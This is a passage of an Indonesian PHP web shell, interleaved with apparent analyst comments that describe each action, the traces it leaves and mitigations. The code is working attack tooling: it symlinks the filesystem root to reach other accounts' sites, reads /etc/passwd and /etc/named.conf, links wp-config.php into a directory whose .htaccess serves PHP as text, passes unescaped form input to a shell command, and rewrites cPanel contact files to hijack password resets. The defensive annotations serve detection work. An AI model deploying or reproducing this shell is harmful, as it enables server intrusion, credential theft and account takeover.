  1179. $site = $user['name'] ;
  // Creates the link to the filesystem root; errors (e.g. link already present) are suppressed.
  1180. @symlink("/","sym/root");
  1181. $site = $domsws[1][0];
  1182. $ir = 'ir';
  1183. $il = 'il';
  1184. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
  1185. $site = ".$domsws[1][0].";
  1186. }
  1187. echo "
  1188. <tr>
  1189. <td>
  1190. <a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
  1191. </td>
  1192. <td>
  1193. ".$user['name']."
  1194. </td>
  1195. <td>
  1196. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
  1197. </td>
  1198. </tr>";
  1199. flush();
  1200. flush();
  1201. }
  1202. }
  1203. }
  1204. echo "</table>
  1205. </div><br/>";
  1206. }
  1207. exit;
  1208. }
  1209.  
  /*
  Action `aksi=symread`. Shows /etc/named.conf (HTML-escaped) in an editable
  textarea and, when the request carries `save`, writes the posted `file` field to
  ./named.txt. The aksi=symlink action reads ./named.txt in preference to
  /etc/named.conf, so this is how the zone list is supplied when the system file
  is unreadable.
  The three `else if (!$r3ad)` branches test the same condition, so when fopen()
  fails only the first one (show_source) can run.
  Artifacts to look for: a `named.txt` file next to the shell; access-log entries
  carrying `aksi=symread`.
  Mitigation: `open_basedir` or file permissions that keep the PHP user from
  reading /etc/named.conf.
  */
  1210. if($_GET['aksi'] == 'symread') {
  1211. echo "read /etc/named.conf";
  1212. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
  1213. <textarea class='form-control' rows='8' name='file'>";
  1214. flush();
  1215. flush();
  1216. $file = '/etc/named.conf';
  1217. $r3ad = @fopen($file, 'r');
  1218. if ($r3ad){
  1219. $content = @fread($r3ad, @filesize($file));
  1220. echo "".htmlentities($content)."";
  1221. }else if (!$r3ad) {
  1222. $r3ad = @show_source($file) ;
  1223. }else if (!$r3ad) {
  1224. $r3ad = @highlight_file($file);
  1225. }else if (!$r3ad) {
  1226. $sm = @symlink($file,'sym.txt');
  1227. if ($sm){
  1228. $r3ad = @fopen('sym/sym.txt', 'r');
  1229. $content = @fread($r3ad, @filesize($file));
  1230. echo "".htmlentities($content)."";
  1231. }
  1232. }
  1233. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
  // Save path: posted text is unescaped with stripcslashes() and written to ./named.txt.
  1234. if(isset($_GET['save'])){
  1235. $cont = stripcslashes($_POST['file']);
  1236. $f = fopen('named.txt','w');
  1237. $w = fwrite($f,$cont);
  1238. if($w){
  1239. echo '<br/>save has been successfully';
  1240. }
  1241. fclose($f);
  1242. }
  1243. exit;
  1244. }
  1245.  
  /*
  Action `aksi=sym_404`. Prints a form asking for a target file path and a link
  name. On submit it recreates ./xploit404 (mode 0777), links the target into it
  under the given name (once through a shell `ln -s` call and once through
  symlink()), and writes ./xploit404/.htaccess with the directives visible below.
  NOTE(review): that .htaccess appears intended to have the linked file shown as
  plain text in the directory index rather than executed - confirm on a test host.
  Both form fields come straight from POST and are concatenated into the shell
  command line without escaping.
  Artifacts to look for: an `xploit404` directory holding a symlink and a
  `.htaccess` containing `ReadmeName` and `AddType text/plain .php`; access-log
  requests for `/xploit404/`.
  Mitigation: an AllowOverride setting that withholds Options, Indexes and FileInfo
  from .htaccess keeps these directives from taking effect; `SymLinksIfOwnerMatch`
  stops the server following a link to a file owned by another account.
  */
  1246. if ($_GET['aksi'] == 'sym_404'){
  1247. echo '<h2>Symlink 404</h2>
  1248. <form method="post">
  1249. File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
  1250. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
  1251. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
  1252. </form>';
  1253. if($_POST['execute']){
  1254. rmdir("xploit404");
  1255. mkdir("xploit404", 0777);
  1256. $dir = $_POST['dir'];
  1257. $isi = $_POST['isi'];
  1258. system("ln -s ".$dir."xploit404/".$isi);
  1259. symlink($dir,"xploit404/".$isi);
  1260. $inija = fopen("xploit404/.htaccess", "w");
  1261. fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any");
  1262. echo'<a href="/xploit404/" target="_blank"> >>Sukses<< </a>';
  1263. }
  1264. exit;
  1265. }
  1266.  
  1267.  
  /*
  Action `aksi=sym_bypas`. Two phases:
  1. When the request carries `save` plus a posted `file` field, or ./passwd.txt
     already has content, the posted text is written to ./passwd.txt (only if that
     file does not exist yet). Each line of passwd.txt is then split on ":" and the
     first field is printed as a user name with links to
     sym/root/home/<user>/public_html; the script ends there.
  2. Otherwise it prints a form whose textarea is pre-filled with /etc/passwd
     (HTML-escaped) for the operator to submit back.
  The `elseif(!$r3ad)` branches repeat one condition, so only the first
  (show_source) can run when fopen() fails; the posix_getpwuid() loop over uids
  0-999 sits in a branch that cannot be reached as written.
  NOTE(review): $pageFTP is not assigned anywhere in this part of the file.
  Artifacts to look for: a `passwd.txt` file next to the shell; access-log entries
  carrying `aksi=sym_bypas`.
  Mitigation: the links depend on the sym/root link and on the web server following
  it - see `SymLinksIfOwnerMatch` and home-directory permissions.
  */
  1268. if ($_GET['aksi'] == 'sym_bypas'){
  1269. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  1270. $cont = stripcslashes($_POST['file']);
  1271. if(!file_exists('passwd.txt')){
  1272. $f = @fopen('passwd.txt','w');
  1273. $w = @fwrite($f,$cont);
  1274. fclose($f);
  1275. }
  1276. if($w or @filesize('passwd.txt') > 0){
  1277. echo "<div class='tmp'>
  1278. <table width='100%'>
  1279. <thead class='bg-info'>
  1280. <th>Users</th>
  1281. <th>symlink</th>
  1282. <th>FTP</th>
  1283. </thead>";
  1284. flush();
  1285. $fil3 = file('passwd.txt');
  1286. foreach ($fil3 as $f){
  1287. $u=explode(':', $f);
  1288. $user = $u['0'];
  1289. echo "<tr>
  1290. <td class='left'>$user</td>
  1291. <td>
  1292. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  1293. </td>
  1294. <td>
  1295. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  1296. </td>
  1297. </tr>";
  1298. flush();
  1299. flush();
  1300. }
  1301. die ("</tr></table></div>");
  1302. }
  1303.  
  1304. }
  1305.  
  1306. echo "read /etc/passwd";
  1307. echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
  1308. <textarea class='form-control' rows='8' name='file'>";
  1309. flush();
  1310. $file = '/etc/passwd';
  1311. $r3ad = @fopen($file, 'r');
  1312. if ($r3ad){
  1313. $content = @fread($r3ad, @filesize($file));
  1314. echo "".htmlentities($content)."";
  1315. }elseif(!$r3ad) {
  1316. $r3ad = @show_source($file) ;
  1317. }elseif(!$r3ad) {
  1318. $r3ad = @highlight_file($file);
  1319. }elseif(!$r3ad) {
  1320.  
  1321. for($uid=0;$uid<1000;$uid++){
  1322. $ara = posix_getpwuid($uid);
  1323. if (!empty($ara)) {
  1324. while (list ($key, $val) = each($ara)){
  1325. print "$val:";
  1326. }
  1327. print "\n";
  1328. }
  1329. }
  1330. }
  1331. flush();
  1332. echo "</textarea><br/>
  1333. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
  1334. </form>";
  1335. flush();
  1336. exit;
  1337. }
  1338.  
  1339.  
  /*
  Action `aksi=CpanelReset`. Prints a form asking for an e-mail address. On submit
  it overwrites /home/<user>/.cpanel/contactinfo and /home/<user>/.contactinfo with
  the single line "email:<posted address>", where <user> is get_current_user(),
  then prints the panel's password-reset URL (<host>:2082/resetpass?start=1), the
  account name and the address. The effect is that a later password reset for the
  account is mailed to the address supplied in the form.
  $ips is assigned but not used in this block.
  Artifacts to look for: changed content or modification time on ~/.contactinfo and
  ~/.cpanel/contactinfo; `resetpass` requests in the panel's logs shortly after a
  request carrying `aksi=CpanelReset`.
  Response: restore the contact address, rotate the account password, and review
  panel logins since the change. Where the panel allows it, disabling self-service
  password reset removes this path.
  */
  1340. if ($_GET['aksi'] == 'CpanelReset') {
  1341. echo '<br/><p class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</p>
  1342. <form method="POST">
  1343. <div class="form-group">
  1344. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/><br/>
  1345. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
  1346. </div>
  1347. </form>';
  1348.  
  1349. if(isset($_POST['submit'])){
  1350. $user = get_current_user();
  1351. $site = $_SERVER['HTTP_HOST'];
  1352. $ips = getenv('REMOTE_ADDR');
  1353. $email = $_POST['email'];
  1354. $wr = 'email:'.$email;
  // Both contact-info files are opened in "w" mode, so their previous content is discarded.
  1355. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  1356. fwrite($f, $wr);
  1357. fclose($f);
  1358. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  1359. fwrite($f, $wr);
  1360. fclose($f);
  1361. $parm = $site.':2082/resetpass?start=1';
  1362. echo '<br/>Url: '.$parm.'';
  1363. echo '<br/>Username: '.$user.'';
  1364. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
  1365. }
  1366. exit;
  1367. }
  1368.  
  /*
  Default view (reached when none of the earlier actions called exit): resolves the
  directory to list, prints a clickable breadcrumb for it, and opens the listing table.
  The directory comes from the `path` query parameter when present (the process
  chdir()s into it, with no validation); otherwise the current working directory is
  used. The breadcrumb links themselves are built with a `dir` parameter.
  Log hunting: requests to a single script with `dir=` or `path=` values that are
  absolute filesystem paths.
  */
  1369. if(isset($_GET['path'])){
  1370. $path = $_GET['path'];
  1371. chdir($path);
  1372. }else{
  1373. $path = getcwd();
  1374. }
  // Normalise Windows separators, then split into components for the breadcrumb.
  1375. $path = str_replace('\\','/',$path);
  1376. $paths = explode('/',$path);
  1377. echo "<br/>Lokasi Saat Ini => ";
  1378. foreach($paths as $id=>$pat){
  // A leading empty component means the path is absolute: emit the root link.
  1379. if($pat == '' && $id == 0){
  1380. $a = true;
  1381. echo '<a href="?dir=/">/</a>';
  1382. continue;
  1383. }
  1384. if($pat == '') continue;
  // Each crumb links to the path made of components 0..$id.
  1385. echo '<a href="?dir=';
  1386. for($i=0;$i<=$id;$i++){
  1387. echo "$paths[$i]";
  1388. if($i != $id) echo "/";
  1389. }
  1390. echo '">'.$pat.'</a>/';
  1391. }
  1392. $scandir = scandir($path);
  1393. echo "<hr>";
  1394. echo '<div class="table-responsive-lg">
  1395. <table class="table table-hover table-bordered text-white">
  1396. <thead class="bg-warning text-dark text-center">
  1397. <th scope="col">Nama</th>
  1398. <th scope="col">Type</th>
  1399. <th scope="col">Size</th>
  1400. <th scope="col">Permission</th>
  1401. <th scope="col">Action</th>
  1402. </thead>';
  1403.  
  /*
  First pass over the directory listing: one table row per sub-directory, with the
  name (truncated to 25 characters for display), a size figure, the permission
  string from perms(), and links to the `rename_folder` and `hapus_folder` actions.
  The is_dir()/filesize() calls at the top of the loop use $file, which this loop
  never assigns; its value comes from code outside this loop.
  Entry names and paths are written into the HTML without escaping.
  Log hunting: `aksi=rename_folder` and `aksi=hapus_folder` in query strings.
  */
  1404. foreach($scandir as $dir){
  1405.  
  1406. /* check whether this entry is a folder */
  1407. /* check whether the folder name is too long */
  1408. if (strlen($dir) > 25) {
  1409. $_dir = substr($dir, 0, 25)."...";
  1410. }else{
  1411. $_dir = $dir;
  1412. }
  1413. if(!is_dir($path.'/'.$file)) continue;
  1414. $size = filesize($path.'/'.$file)/1024;
  1415. $size = round($size,3);
  1416.  
  1417. if($size >= 1024){
  1418. $size = round($size/1024,2).' MB';
  1419. }else{
  1420. $size = $size.' KB';
  1421. }
  // Skip non-directories and the "." / ".." entries.
  1422. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  1423. echo
  1424. '<tr>
  1425. <td class="text-white">
  1426. <img src="http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png" class="ico"></img> <a href="?dir='.$path.'/'.$dir.'">'.$_dir.'</a></td>
  1427. <td class="text-center">Directory</td>
  1428. <td class="text-white"><center>'.$size.'</center></td>
  1429. <td class="text-white"><center>';
  // Colour the permission string: green when writable, red when unreadable.
  1430. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
  1431. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  1432. echo perms($path.'/'.$dir);
  // The closing markup and the action links are emitted only when one of the two
  // colour conditions above held.
  1433. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>
  1434. <td><center>
  1435. <a title="Ubah Nama" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;Ubah Nama</a>&nbsp;&nbsp;
  1436. <a title="Delete" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;Hapus</a>
  1437. </td>
  1438. ';
  1439. }
  1440.  
  /*
  Second pass over the directory listing: one table row per regular file, showing an
  icon chosen by extension (loaded from third-party image hosts), the file name
  (truncated to 25 characters for display), a type label chosen by extension, the
  size in KB or MB, the permission string from perms(), and links to the `view`,
  `edit`, `rename` and `hapusf` actions with the full file path in `dirf`.
  File names and paths are written into the HTML without escaping.
  Log hunting: query strings combining `aksi=view|edit|rename|hapusf` with a `dirf=`
  parameter holding an absolute path are a compact signature of this file manager.
  */
  1441. foreach($scandir as $file){
  1442.  
  1443.  
  1444. if(!is_file($path.'/'.$file)) continue;
  // Size in KB rounded to 3 decimals, switched to MB at 1024 KB and above.
  1445. $size = filesize($path.'/'.$file)/1024;
  1446. $size = round($size,3);
  1447.  
  1448. if($size >= 1024){
  1449. $size = round($size/1024,2).' MB';
  1450. }else{
  1451. $size = $size.' KB';
  1452. }
  1453.  
  1454.  
  1455. echo '<tr>
  1456. <td><img src="';
  // Icon URL by lower-cased extension; the first branches also emit a closing quote.
  1457. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
  1458. if($ext == "php") {
  1459. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
  1460. }elseif ($ext == "html") {
  1461. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
  1462. }elseif ($ext == "css") {
  1463. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
  1464. }elseif ($ext == "png") {
  1465. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
  1466. }elseif ($ext == "jpg") {
  1467. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
  1468. }elseif ($ext == "jpeg") {
  1469. echo 'http://i.imgur.com/e8mkvPf.png"';
  1470. }elseif($ext == "zip") {
  1471. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
  1472. }elseif ($ext == "js") {
  1473. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
  1474. }elseif ($ext == "ttf") {
  1475. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
  1476. }elseif ($ext == "otf") {
  1477. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
  1478. }elseif ($ext == "txt") {
  1479. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
  1480. }elseif ($ext == "ico") {
  1481. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
  1482. }elseif ($ext == "conf") {
  1483. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
  1484. }elseif ($ext == "htaccess") {
  1485. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
  1486. }elseif ($ext == "sh") {
  1487. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
  1488. }elseif ($ext == "py") {
  1489. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
  1490. }elseif ($ext == "sql") {
  1491. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
  1492. }elseif ($ext == "pl") {
  1493. echo 'http://i.imgur.com/PnmX8H9.png';
  1494. }elseif ($ext == "pdf") {
  1495. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
  1496. }elseif ($ext == "mp4") {
  1497. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
  1498. }elseif ($ext == "mp3") {
  1499. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
  1500. }elseif ($ext == "git") {
  1501. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
  1502. }elseif ($ext == "md") {
  1503. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
  1504. }else{
  1505. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
  1506. }
  1507. echo '" class="ico2"></img>';
  1508.  
  // Display name: long names are cut to 25 characters and suffixed with the extension.
  1509. if (strlen($file) > 25) {
  1510. $_file = substr($file, 0, 25)."...-.".$ext;
  1511. }else{
  1512. $_file = $file;
  1513. }
  1514.  
  1515. echo' <a href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">'.$_file.'</a></td>';
  1516. echo '<td class="text-center">';
  1517. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
  1518.  
  // Type column: a display label picked by extension (these are the shell's own
  // strings, not values read from the file).
  1519. if($ext == "php") {
  1520. echo 'application/octet-stream';
  1521. }elseif ($ext == "html") {
  1522. echo 'text/html';
  1523. }elseif ($ext == "css") {
  1524. echo 'application/octet-stream';
  1525. }elseif ($ext == "png") {
  1526. echo 'image/png';
  1527. }elseif ($ext == "jpg") {
  1528. echo 'image/jpg';
  1529. }elseif ($ext == "jpeg") {
  1530. echo 'image/jpeg';
  1531. }elseif($ext == "zip") {
  1532. echo 'dokumen/zip';
  1533. }elseif ($ext == "js") {
  1534. echo 'text/js';
  1535. }elseif ($ext == "ttf") {
  1536. echo 'application/octet-stream';
  1537. }elseif ($ext == "otf") {
  1538. echo 'application/octet-stream';
  1539. }elseif ($ext == "txt") {
  1540. echo 'text/txt';
  1541. }elseif ($ext == "ico") {
  1542. echo 'application/octet-stream';
  1543. }elseif ($ext == "conf") {
  1544. echo 'application/octet-stream';
  1545. }elseif ($ext == "htaccess") {
  1546. echo 'application/octet-stream';
  1547. }elseif ($ext == "sh") {
  1548. echo 'application/octet-stream';
  1549. }elseif ($ext == "py") {
  1550. echo 'application/octet-stream';
  1551. }elseif ($ext == "sql") {
  1552. echo 'application/octet-stream';
  1553. }elseif ($ext == "pl") {
  1554. echo 'application/octet-stream';
  1555. }elseif ($ext == "pdf") {
  1556. echo 'dokumen/pdf';
  1557. }elseif ($ext == "mp4") {
  1558. echo 'media/mp4';
  1559. }elseif ($ext == "mp3") {
  1560. echo 'media/mp3';
  1561. }elseif ($ext == "git") {
  1562. echo 'application/octet-stream';
  1563. }elseif ($ext == "md") {
  1564. echo 'application/octet-stream';
  1565. }else{
  1566. echo 'dokumen/docs';
  1567. }
  1568. echo '</td>
  1569. <td><center>'.$size.'</center></td>
  1570. <td><center>';
  // Colour the permission string: green when writable, red when unreadable.
  1571. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
  1572. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  1573. echo perms($path.'/'.$file);
  // The action links are emitted only when one of the two colour conditions above held.
  1574. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>
  1575. <td class="text-center">
  1576. <a title="Lihat" class="badge" href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">Lihat</a>
  1577. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=edit&dirf='.$path.'/'.$file.'">Edit</a>
  1578. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=rename&dirf='.$path.'/'.$file.'">Ubah Nama</a>
  1579. <a class="badge" href="?dir='.$path.'&aksi=hapusf&dirf='.$path.'/'.$file.'" title="Delete">Hapus</a>
  1580. </td>
  1581. </tr>';
  1582. }
  // Page footer: closes the listing table and prints a fixed credit line with the
  // current month and year. The literal text and URL below are constant across
  // responses, which makes them usable as content-match strings when scanning
  // served pages or files on disk for this shell.
  1583. echo '</table></div><hr/>';
  1584. echo "<a href='' class='scrollToTop'><i class='fas fa-arrow-up up'></i></a>";
  1585. echo '<center><small>Copyright all right reserved '.date('M-Y').' <a href="http://ies-team.org">Indonesian Error System</a></small></center>';
  1586. ?>